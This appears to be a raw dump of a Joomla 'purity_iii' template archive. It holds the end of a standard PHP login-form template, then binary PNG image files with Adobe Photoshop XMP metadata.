		<p id="form-login-username">
			<label for="username"><?php echo JText::_('JGLOBAL_USERNAME') ?></label>
			<input name="username" id="username" type="text" class="inputbox" alt="<?php echo JText::_('JGLOBAL_USERNAME') ?>" size="18" />
		</p>
		<p id="form-login-password">
			<label for="passwd"><?php echo JText::_('JGLOBAL_PASSWORD') ?></label>
			<input type="password" name="password" class="inputbox" size="18" alt="<?php echo JText::_('JGLOBAL_PASSWORD') ?>" id="passwd" />
		</p>
		<?php if (count($twofactormethods) > 1) : ?>
		<p id="form-login-secretkey">
			<label for="secretkey"><?php echo JText::_('JGLOBAL_SECRETKEY') ?></label>
			<input type="text" name="secretkey" class="inputbox" size="18" alt="<?php echo JText::_('JGLOBAL_SECRETKEY') ?>" id="secretkey" />
		</p>
		<?php endif; ?>
		<?php if (JPluginHelper::isEnabled('system', 'remember')) : ?>
		<p id="form-login-remember">
			<label for="remember"><?php echo JText::_('JGLOBAL_REMEMBER_ME') ?></label>
			<input type="checkbox" name="remember" class="inputbox" value="yes" alt="<?php echo JText::_('JGLOBAL_REMEMBER_ME') ?>" id="remember" />
		</p>
		<?php endif; ?>
		<p id="submit-buton">
			<label>&nbsp;</label>
			<input type="submit" name="Submit" class="button login" value="<?php echo JText::_('JLOGIN') ?>" />
		</p>
		<input type="hidden" name="option" value="com_users" />
		<input type="hidden" name="task" value="user.login" />
		<input type="hidden" name="return" value="<?php echo base64_encode(JUri::base()) ?>" />
		<?php echo JHtml::_('form.token'); ?>
	</fieldset>
	</form>
	</div>
</body>
</html>
PKԜ�\v� ��purity_iii/images/emoticons.pngnu&1i��PNG


IHDRP�2��ltEXtSoftwareAdobe ImageReadyq�e<siTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:9fab078a-094a-472b-ade3-d8e33bc0088b" xmpMM:DocumentID="xmp.did:7543FF0B835C11E39065B83AE4DFD553" xmpMM:InstanceID="xmp.iid:7543FF0A835C11E39065B83AE4DFD553" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:04d8da76-7302-4a83-ad53-fb9494c71a84" stRef:documentID="xmp.did:9fab078a-094a-472b-ade3-d8e33bc0088b"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�/u�IDATx��]�U���-P
�|lZ�P�R�R(�X"�рb$TE�>
�$�D��RTԴc��ʷ����`-�>
-m}���׎������ܹ����3��Y�|�9g�^C�c� �@�@��$p�`����C���=�����`�[�]y��d�v6F�b,g@H\�-!��	�9�>�F;HkF�`����4��}��TR�����"�&p�`�ۣECԛ��lS;�[�d2h%x�y^�ȶ p����*�q�*�qK�	d��`�T�m�1�6W��m�*�\��^�'c��@禶yi���� �Ǽ)�N���cb'Vp��L,/x[��UiW�H�}�V8L��v�$�K�N���k�X6���C��1�I�J��y�P��v�@w������8ot|�y�f��e�{��e������=u$�7C?��v�X|+��-*�&c))���]xw��$��Qa���T�uFIJ�נ�~���ݜ�0�gY�a�,j5�Nϊ�@E����*�-3~��G#�UߍGA`���d����.�T�{��몙�'{ނ������4z�=���
�>�,vF݃�u���݂Bf�."���	[� ��."��"��>7v����|�E~P��w��A�."0w]5�1/oH�#sgW1<�U^S��.d~�P�����J2,Q������ר�%���+ZH�
C��-�@���(�y��>���R�[�«��8؆�ǎ�҂�f"����N�]- ���G��J��1+��_\�Z�ݗE��E �ǮV|��`7�H୤;Y-u*�@��Vu9�is��ҿ5ߗ�@��+g�fq�|�v���c�ɻ#ݫtV��D"w�����kZ�/6����w�s亘�\eW\�b=h�O)M����P�Ӄ�D�?�mov������\k��^;*���5��
��-6����')�#��6���l�����d���3E�q�^���uu���3Tч
��*w�<pi\l�#������4�t""�H{�e�dI��;�d|��;�\�t��g�~�,�Kק~��@A @ � � �@�@A`N@O����uq�0z" ��X:=�'�t��'��'��D��
�D�Y�8�.�Dk[��DҘP����Z@O��BO�م�'�$z"�'�$z"N�'✅�'�$z"�.=��p�z"N@O�	�8=�*='��q='��qX��tTNO����I�<J��ى*e�%�ၪ�e*ݕZ&=�
�+�ll~��)n���z�d�IcI�\a޻��(o��1��oh��������4�.�%��Խ��{.g9�r�Oսo�+�&�\[4���d�N��*%ǒ�C����8f�U�m��Q%�>LI���]��q/rx
�l�Z}�J �Lu�]V�iMp��)���q��E ���Z��
v2%�<�`F�O�Y�gLp���GP��jN	�I!�����֭u��x��Ƿ�8�d�z������f�7F�O�&���̧ofI���D���H��%�A+�V���?�艴�'�
�:RO�@O��8�<�8�,��:�(=#i�!�t/@ �  �@�@A A �� 0'�'b�D�����8�v=�f,����q:��q�yU��?('g�z��4�Q�Db̐�U��)�n��+��R�nz"�MI
�Ք<!� �9���S=O���ȉ��v����;/E�$���k���N�I)2�-z"x�n"��QJ'����U]O�ϩ�wY]���N C΄m����z"�\��:��O��鉬-��*�X�DJM*�2�V(��=5�Q������♲�j��ŤT�/5+�1Z��z"�����F+3�"=��5�C�%��	�WS���Յ��'�)��	vG���{lj�W�lj�N�g8����&0���1M>Ӗ5+���Ҩ�9 5�
��"u]�WMOd!5�Y��5������5]Z�c�G�D��s_N�V����R��z"�1�]�DNI�3h�j��v���ȘuՐҮz"�S�-�9�䮫f�M�>'Y�CO�I �D�BO�I �D�BO�I �D�BO$�,=�����@U��vx7 e^�D����e����ص���]�(�5�d,�L�WQ�|��Q�-���}x!%ɼ{r��{ߍ��}dx��\����"G�}S��r����F�>�W�!��C`��1wh~L�A�`1�[�{WF��~r��BOz".@O��8='y�q8��1z"?z"7z"Ʊz"J@O�H�Dz"�A ��  �@�@A A �	�=#p�� �@O����K�'��D��0�Dcޔ
w�F��'���TMI���Dp�x�����ȑ���D�N��q¬'b%p_�<L(��v����'��Zx�Db&��3�ץ�!R'�^e�7������#ɾ�7x}�b^h�D8Q�����j`2�R��D΢�z"g�ՠ,�6I�Df?���&��\B`�z"U�(��0TYp=�gYx��g�z�4
�l=�f 7(���kP�B�}������K�:<U֍=��#�������D�(d��"{� �����'�$z"N�'�$z"N�'�$z"N�'�\]��D�J�L������v��(	��&?>o�O�L��=%����*�_{&�;)�;	�ln��9➳�r�p���Z|v�"���C隝M��r�q��W�"�{��r�����������*�Pɫ'rtI����k�z"���*G�*yB8�躕�'2�d�V|�-�D�Hڥ�:��'�]����پd���o�'��D����qz"N�'b�D����q�Y�1�u�Qz"FҠ'B��^�@A @ � � �@�@A`N@O����uq�0z" ��X:=�'�t��'��'��D��
�D�Y�8�.�Dk[��DҘP����Zx�Dx�>#�g�_)I���E��׭�z"|�:���]F����*�����Qi��f����?L��D�7~���S]>J�Q~כK� �g1�a����n�m��'����9�,XT9\ϋ)92.�ڤWVO�YnҾ�9�������u�#�ɿ��y��1���d5�C�@���<��׈���_Ë 0����Q���@�p��f�Z�Rv�����|%!l��
(��A�ȇ`'x�Y��n��or,=9����W�nL� ODD��=A���5��v��ȣ��@ODp� x�얌��'"�,��4���);{o�j\�v��%��Z�q
��ʿ��j��*=��OQΔ���v�s�hg�w��@U�vy�Q�E���(�ꁲz`w[�|��6��x�<]P�PE��}���
���G�G��$��O/|W}�d��▲��Fy+��H��yS�����kN!�g�ֿI6xݻ�y_oK˦"	�2�q��J�,��:��`K�{����]��lf��F�+��&y�|.\�t�X�'b��^^2��w�W�#�oY��&��PrȮ���Ճ��@ęj���)�A�+)I��d]B[�u����pܴZ�l=��e��ώ@Igו��YO�����GP��r�}ĺY��P�\���rr�4AOz"f@O��8Ƀ���qz"?z"7z"Ʊz"J@O�H�Dz"�A ��  �@�@A A �	�=#p�� �@O����K�'��D��0�Dc�D����U���c==gׅ��cm=��H�"z"N�z"��ǻ1ǖ�h���ڃ�{�j��$��S��װ���x�WQ� �s�=B�r_1Q�㳔$�'�i��R��R?q���.�s)��Kr��{D2qs(I#5>�˔(6x6R���W�"К�(�����ff{��T�+�l���́oʩ�*��6���ݍ+xS�5p��q4��R䑔�"���me��pK]7�|���V\֭����԰I�4^V\�R��i�+�'R�(���qV�)��\��a*5WmТ�z"$����vm��r�\+�,����\�	��1w]5������y��$�9���Qv_�
6C^s��������΢��*��:��	�[�%%�1��k���n��X��@lgof�t��d�|��/�$D�Lu�k5�#���#��D��L��JRp�^����I����B���k}�wY8�4Y��Muǫ��6��8L���n�F�@O$B̽A�e��㱲Y0Av~��yC\��ə�3f]��'�ı��s�-�,(���z"��E�Csyr�TfK
�=��ly��a@f���E艰��H�;��:9�=�"���J1�<y�r��E�ߔq3Tu��Kq�x̻0�p0D����I়�� �Gْ�V����YCʀt˹�*�M����j8^ֿ��f!�73�79����V�9���pj��Y���
t�=e����,���xrb��:���'>��i���Rv?9�|�1��Ln�g=KB�@O��8='y�q8��1z"F@O��fAO�8�AOD	�I��AO�{A � � �@���
0�g�+�]aIEND�B`�PKԜ�\�Lα��purity_iii/images/arrow.pngnu&1i��PNG


IHDR		�tEXtSoftwareAdobe ImageReadyq�e<"iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:327F24B3F65E11E1BD498D5063386CBC" xmpMM:DocumentID="xmp.did:327F24B4F65E11E1BD498D5063386CBC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:327F24B1F65E11E1BD498D5063386CBC" stRef:documentID="xmp.did:327F24B2F65E11E1BD498D5063386CBC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�X�3>IDATx�b���?!���IOO�`��gΜ	���h�0�	�
��Q���"FB�	YLj!@L8�x

��K�IEND�B`�PKԜ�\��8�����+purity_iii/images/Background_megadanse2.pngnu&1i��PNG


IHDR�[G|�	pHYs.#.#x�?vF�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42        ">
   <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about=""
            xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/"
            xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
            xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#"
            xmlns:dc="http://purl.org/dc/elements/1.1/"
            xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"
            xmlns:xmp="http://ns.adobe.com/xap/1.0/"
            xmlns:tiff="http://ns.adobe.com/tiff/1.0/"
            xmlns:exif="http://ns.adobe.com/exif/1.0/">
         <xmpMM:DocumentID>adobe:docid:photoshop:72bce88f-916e-11e7-887a-877f55956bf4</xmpMM:DocumentID>
         <xmpMM:InstanceID>xmp.iid:84adca2d-f17a-d64a-80c4-c942f2dbdb47</xmpMM:InstanceID>
         <xmpMM:OriginalDocumentID>2151462FC599736CB5860B868C3B3C96</xmpMM:OriginalDocumentID>
         <xmpMM:History>
            <rdf:Seq>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:3c72213c-95d9-cc4d-b185-890998dc5e8b</stEvt:instanceID>
                  <stEvt:when>2017-09-03T16:23:08+02:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from image/jpeg to application/vnd.adobe.photoshop</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>derived</stEvt:action>
                  <stEvt:parameters>converted from image/jpeg to application/vnd.adobe.photoshop</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:1c115609-bffe-a74a-9889-9c926555d3d4</stEvt:instanceID>
                  <stEvt:when>2017-09-03T16:23:08+02:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:05aec5f9-aabb-8e4d-ac4d-50e0a950b0fb</stEvt:instanceID>
                  <stEvt:when>2017-09-03T16:24:27+02:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>converted</stEvt:action>
                  <stEvt:parameters>from application/vnd.adobe.photoshop to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>derived</stEvt:action>
                  <stEvt:parameters>converted from application/vnd.adobe.photoshop to image/png</stEvt:parameters>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:367d7928-3330-be44-94d3-9024241ef2d5</stEvt:instanceID>
                  <stEvt:when>2017-09-03T16:24:27+02:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
               <rdf:li rdf:parseType="Resource">
                  <stEvt:action>saved</stEvt:action>
                  <stEvt:instanceID>xmp.iid:84adca2d-f17a-d64a-80c4-c942f2dbdb47</stEvt:instanceID>
                  <stEvt:when>2017-09-04T14:42:24+02:00</stEvt:when>
                  <stEvt:softwareAgent>Adobe Photoshop CC 2015 (Windows)</stEvt:softwareAgent>
                  <stEvt:changed>/</stEvt:changed>
               </rdf:li>
            </rdf:Seq>
         </xmpMM:History>
         <xmpMM:DerivedFrom rdf:parseType="Resource">
            <stRef:instanceID>xmp.iid:05aec5f9-aabb-8e4d-ac4d-50e0a950b0fb</stRef:instanceID>
            <stRef:documentID>xmp.did:1c115609-bffe-a74a-9889-9c926555d3d4</stRef:documentID>
            <stRef:originalDocumentID>2151462FC599736CB5860B868C3B3C96</stRef:originalDocumentID>
         </xmpMM:DerivedFrom>
         <dc:format>image/png</dc:format>
         <photoshop:ColorMode>3</photoshop:ColorMode>
         <xmp:CreateDate>2017-08-26T22:07:20+02:00</xmp:CreateDate>
         <xmp:ModifyDate>2017-09-04T14:42:24+02:00</xmp:ModifyDate>
         <xmp:MetadataDate>2017-09-04T14:42:24+02:00</xmp:MetadataDate>
         <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>
         <tiff:ImageWidth>1300</tiff:ImageWidth>
         <tiff:ImageLength>1300</tiff:ImageLength>
         <tiff:BitsPerSample>
            <rdf:Seq>
               <rdf:li>8</rdf:li>
               <rdf:li>8</rdf:li>
               <rdf:li>8</rdf:li>
               <rdf:li>8</rdf:li>
            </rdf:Seq>
         </tiff:BitsPerSample>
         <tiff:PhotometricInterpretation>1</tiff:PhotometricInterpretation>
         <tiff:Orientation>1</tiff:Orientation>
         <tiff:SamplesPerPixel>4</tiff:SamplesPerPixel>
         <tiff:XResolution>3000000/10000</tiff:XResolution>
         <tiff:YResolution>3000000/10000</tiff:YResolution>
         <tiff:ResolutionUnit>2</tiff:ResolutionUnit>
         <exif:ExifVersion>0221</exif:ExifVersion>
         <exif:ColorSpace>65535</exif:ColorSpace>
         <exif:PixelXDimension>249</exif:PixelXDimension>
         <exif:PixelYDimension>347</exif:PixelYDimension>
      </rdf:Description>
   </rdf:RDF>
</x:xmpmeta>
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                                                                                                    
                            
<?xpacket end="w"?>]#?� cHRMz%������u0�`:�o�_�F�}IDATx��TIv'�"2�E	!������5�1���ey<��2�ǰ,��yX˲������zz���hY=-����V��,f�V�`��33j�aL34M�4B���(��23�df!UR���6�O���̈̌�O�{?�^�c��3/����x�����F�;���~ ��
+'�pE(B���VD�_�2���/�Zm�f��Y`��~j�ծԎV�ϯ?����^�
V��6�F���M�0�y�?�<��h�k�IE�^�N�09Lr�!G�%��|	@������Ab�O�I?�d c�9h���� 7�
�;����?6�2/�2 
��p�D̉�@0�jx�5���	�o�`��8;�����0W}���o�]�X��qao��H`���x�Ɔ�;	x�6no�܉�7�o�������'��
6a�{���ZW(��,�4��=A�A��6;8;�֭o�"-���x
P1898��=�=��������L_��i�_?n��%��b<Y�ļ<�/�_����O��E#�7`i���_
pF�����Y�,�����*u�|�LJKDv}v=�����U�{}�p� ����Ӏ�f]��A����wOF���Hw��
`��N����;��=����=EOd�L�i���Q6��Q�'��!�W��=HI#i�e�l`����8��8��wӞC[״�!A�nt�@<���9�6�f��+�u�ցq�!�7f�q��=�������@�������z<��_���i��o����V����<v�n�y,��ͦ%kcm�
�[��`�,���< �F"�I���(��F�ok�[v���_m#L"I$�HI 	�"Q$
!,�%���$$=7�v��c�gUv�|�|�E��ڄT&ՍW�5�F���A2��b���Y�Y�Y���n@.�Y40��
�Q��+{W��O�
�H�y���
Y!�\�E鴀��ޥwb�.q���-�@�Io�m�
q���_�$|���´E�2�G�8B�I5�y,c�X��� �H`%'�I��X|\���d%r��P
 �(@}ۋ5d���,ʆ���m@y�!q����@�i͗Y�йI� �d���Oȵ��\kGn��r}������y�F��z���Ckǵ�O�����߇ݩj]�^������*h�����_����T���=#1#���<{�j]�_�s*[�x�^����0ڎV���Θ�����4�!#�HG�z�Effff�L����Fݍ���ߓ�'�"�H)��vK;�r����a����vv	�|�ʍ�2k�e����aA"�!g�Q�`��a��he�R�&?D��&��	���r7Md]�Sv����2�L���,���[����e�l�0ͬ�*X�L��+r	
c�1��
�vȷ�e�f
��BR$���&��L����gn��@����©|9�D�y ����$�.���ZX#*P��W]o����o|��6����w�[���C;U�k�^Sq�b������Anl�ܷ]���|�P瑃5�&�'�&ݤP�Ռ*�[��n ��3=`�*��Mh���Oȵ��Co*�W������/�D��0��<��N�������v��@�l�Z���ȵ~�5s1sa�6r��W��K{�;��;ϝ7�1��Ġ]gT�04��XD!
Q�E�>2��E�BS�)��
mhӎi�4���v�������R�����o-\0��:b7�I�����f�1a@k MX�"�����"�W�X��x�G�q~\��b�Z�ZXj��i�:{([e��Au.9��]�(
J��1��E߭r^���U�R�R�e2�Ur�`�ͲYw�gt�a��Y����?��\�u�:
�d��`6���+5_����x!�_瓬u�$�*R�DC��p��,�,�C�np\�Q�{���Gעo�P�u�j�)�S7��W��F�z�|�T;�����R拶��b��j�*����=Qm�ۯW�g�ןd$#�1�1)HA
u���ij�#̋��︾�@@�O����Ԟ?��U�ˮj}��\ua�Kci,�38�3��!g��*1hd�:!u��=�"i��I6�&ᖓ�d9Nc�1��9��Ȟ#��i�In�)��B� ^��'�%�-�s5$+$k���~����pI8,���Tg�3���]�.~C���_��8�H��.�x_����ʹU�~L�����X(�M1�ш�X\����s~h����Tҕ���,�X����|[��7ܿ�e��p\'�Pי���J�~B�u�ȩ��A�
���;�f{g{�or�qqF� uwj�T�D$"U��bY,�Q4�F=�l�
<$�G8d���O�i�1���YK����z	O|���y��J�vp���Z�~�_ܡM1P{�TD;}�����jh8
�ᛒ��%g�Y�0���lKz��V��[��E��@e����� �D�IF+Z4�ߕ���pC8@rM����
�Jt|t�*�G�J�J�,��w����PO�9�9тc�|�مg��	�dN�$��AF�*��I(	��*z����$���-��H�xKB�ͩ�Tڈ4\�u㊜�Ѽ�Lx��kh�$�z��,�Ќ�.�Y�#:���/�?~�iv�]��JX	^U��j���n�o����@�,����Ozz<=�<�+��An��J��o�\-�T��h��ˮ'���gRz���z}��$��
��kP�GpG����x����+�F�hڦ�ű8��Q�����t}���v��c/�����'=N�0@��F�٘�ٖ�Z�r�~�?)��@�qU�l�T�ޗjs#�$��l�M�)�@��l��UG[�w�L�E+jlQ�I;i�f�r�\&�=��LD"�JRI�sǕ���G��l{�hG;��Y1+p�]dt),v\&��qW�c�1�]���,����b@:�gi�҆Kj
iiX��"�"��R�fٴSq^w^G4�U�C$) �I4.�2�Rn�Ȭ)ǔ�$r�\,d�$�d�\�w��h��ԗ�G�+b��f
u?����g��}s����'�O���I�$@;T@�̍΍�G>m��\��N#1JW�,�ʣϩ�e�*?�o1��V��`�X�h�'�@�uS�)	`MR��`�D�(�Tn�F�3��]�����&������O�������:�]T��z�W �q ����j�j���d'�I��*�B�:w���96���Yn��ڠ�2i"M���cu��5\�5���2V��M^_vY��Z?��8�Er텽�y��|Z@�߱�c_~^m�]�B�&��x�9p���ϡ�0��;��or���I&�$��'�$ E���������0�1�OU���.�,�)La
@&2�	�t�N�S�9�l����J�T(PF�H'p`X'�0/v��⤇�C��U��6��r�x̱c��b�r� �꓅;�BUf�.��)
J�
U�99V�H�!�� ��b#"PDg�`�<�y0s5���۽��^��}�R�����0DJ���h�����O���n:
��@��*�~�@���p��-wƦ�b�z��p- cøa��r1����雿�8	T�>@�w��~ʼq���N�Y�z���F��N���G��]m�j�DgqgR�����W��p5��,V��Y�s�Y2Kf�dCz��e�_
ȳ���/2���_܎����Z���J�!e����G��4[�Ү�c�֕����IG+�j���%v	@�ꆥ��шFhd���#��b��-���Y9+��vLuL5������X��#�`��ʨNd�O��n��M�W�ȇ�t!��³ó2�/d_ ��m�m� �d@-�.k����W�������r���n�t��8��$��`�K��3�tƞi>��Ǖl���ռ�+�2�>އ�j�
�G.&0�|�o@��糓j��~�yQ^�����@<��߳��9V�6>?)ֺ�m�*����Z�ƿ �IB??�e~�}�)��ݧ�������b�v�9Հ����HD�<IN�] �#�-���
pYk`
)&Ť@':�P�H?���CN���4@�A+bE�hs����	�L�H�m&T]�|�U'(K٘ۘ,Ǿz���o̯���S�+�ﵾ�<d��IL����g6�rU,I�'Z}��@`�+�/��+~��oa���[���zk� EJ��r�H�`�y����q��t l�Dɉ�0|��1�r�%�%`�a�0 �:���X�ӱ���.2�a+�w������"BDP��\�l|��O�5-��"�TT�$yJ�ؔ��.1;�����^�qI�H�P�b?((�۬ևU�G�*yϨ��y�*q�/>@R�Q�
[a+9J�����y«@��&��Pv��Հ\�6ؕ�w%�OB"7�������`�I5���z���
��$�1����2��Y$�d��8.�ڥv�����u����sm����bݬ�
�6w�\{�����1y��d�;�Nr'X��������z����_��������͞7{u`�
 \��̿�p�׮RRH�H��F�8�S����z��p���Ï�y�)�?�R�j�j@֖ז�q%\	�3828R�B�.��+@�>]�)������g.H\I\�e^��:���Q	?��~�*����yH�[<y�H-�%��i�T79B��#��yE^������1�J�vD+	�~������+ٔ�I�g@���T�2E(N�4N#N
,3�״�������}���vv�˞��N�����y�^���q
4@W�/�9G�����?aH=�x��/�5r�\��#s�=פ*1k�Rܺz{	Wl�蒗�%�]�B�M��l?�9Tho�%����{���Q?��)�_����M�p�3�o����
����l:N,A�5��P�".��Tx*�(��auX=�8#��a��C�#x�$�ԓz ��w��N@������c�9����5�5�H�1ØAꉰrk�Z���8�zr"�1�Q��=�	�����EuC��Z�4���r��?
y�y�qP��XTc�ST�zW�V��<;����vIbI,�H2I&ɀ
�.r�\!W0��\�\h��q7ʍr�I|*��H.���"��!{��)���b:"Ս���'ߩ��.����E_d �^૒��d�d��m�����FWs�΢�ĝ�&���ʮ���QC�*�X���v�Q{.d_��9f0�#�������t��Yo�~T6�FE�����z�R���mWmW����Y��+�������ξ�H�=y������w�ޙ:x�c��8�/]�����b
3�9����b�g�z�z�y6"D���g��,�>�|	�x�xf�����&7J�d>Yζ^L�J�z6Go�|�2�X��-tc�}L�i�v�۽���f��&��-��4f��B?����s*�����U��u���}L�;P�����'�7;�xk�6���F�*ׇL�׎N�g�b�m�����@e_�&)��M��Y��yu+��YS���Y=��싥��l�w%�*d���f?�t�\맬����n�e�����eӻ�hE�NS���Bj�Ӯck���?ߝ��W���m����n�>���vr���[;����.�����l�-�%Qr��!�7e�q��`���W��j�s~8�Ñ�ό$�$EKY^xR�$�?w������R������-��=��?3��'�Fi@w�;�Io�7��[5~��.�s�jP|P�p�?N�H�'��Y]X�4'�}, �~ːrL��gB��xk2����6�:�qI;t��=��s�}6׶Hl�.哊즿��M��/�Mo����5�����M�h�[�y�"�q�P��͜j\�� d�,HCҞ��x�p���ڼ�:�y-��+��|-���@���h$�] �t�\;�Dp2��=-N�vU�V��B��u�;��(l��&�G�����$������In^��V��w>PH�6��|`I
\2���9xQ\%�F��&�e�A6��˶�@h[���ޫ������o�=,{ls[�>J
	����֛]]<f��G�`�R��˅˅�\���R�n�e�P*�n�������nO�'��������qm���	���v��6ǖY&���^�׃Q�;�}>m��8Wm՚5�� ����n�7��2X�rY.��&ITv����|_AK�����l�Ͳ�ĒX|!���> ��������A����9���5��<P�q��Q�ދ��/:��w���] �Ԁ|k2�j��Z��>潾?����*y��h+m��9OΓ�Ϲ��4���	���D׎����l��XTI~M��<@��09 -B��`H��^8>�q7�D�⦍!�Y�%��l�����h������Ѹv�=�#��B�� �ֳֳLi��Yܳ8�M+~�RVPcP#��=�`�߿��}C"k�Z�V$ȓ�<.\q���OkĻ�]�I��@U%��l��
~��[����=�Iki-���>�i>�ޏ�-l��_�����/$(�^��FH#
��4��~n�q�n��-j2�V�
���nmǾm����&�$�9�?�s|��S�n���X�/*Ұ4,
����[��᪛�Uby���_�4�j�C.r��.�@��4��1r�{��I_�S�k�
T�Up�T�.5��8��<@/���?�ՉQ�Q]X�[��t�w����GҏA@ƒ�̍?ǟ��t���u���D?�~�w���|�d)�=��K�_j�8���@(��8`�_���;m��Z�kŀ;c�e�Xo����X�B"�.K�Re��&W�
mӶiW���s�amr���l��nm|�a`w��Y:k���\[xux5@&�)��b3G�*A
�l�[k�n޸u�]^�vo���O��׏O������Z-��f*�l�u�C�sX�Ъz�~��96��~��W���NU�֩����V�>+պ���ߣ�P����f�٫ֵ��I�?�?W �*Q/�ZV�j��m'�r��LJ�b�i:M�7�[�TX?�g������[6���v�V�IK�nEs@J���K�I3 �^���n��'�	�
Y�-�j���?��E�C�CSD&�s*�I�9���af��cgy�@
y�<�
Y���������#�[䪺!:F�h+�t?�yZ��{e���I:�໮a�0�����;����8���!�-~%�+�b	�1�P˚�)�9�u���w13�%��lQT�r�Z�Z��T.P��������ۗ���$�@�i놦TL,��:�t�7ՀB����b3��^��q%�]�|W"��=�¬�e��7m��D�'|�@�o��f#W�O�/�:�|�.�e�v�n��-\���Z���h��rU�N�}����Z
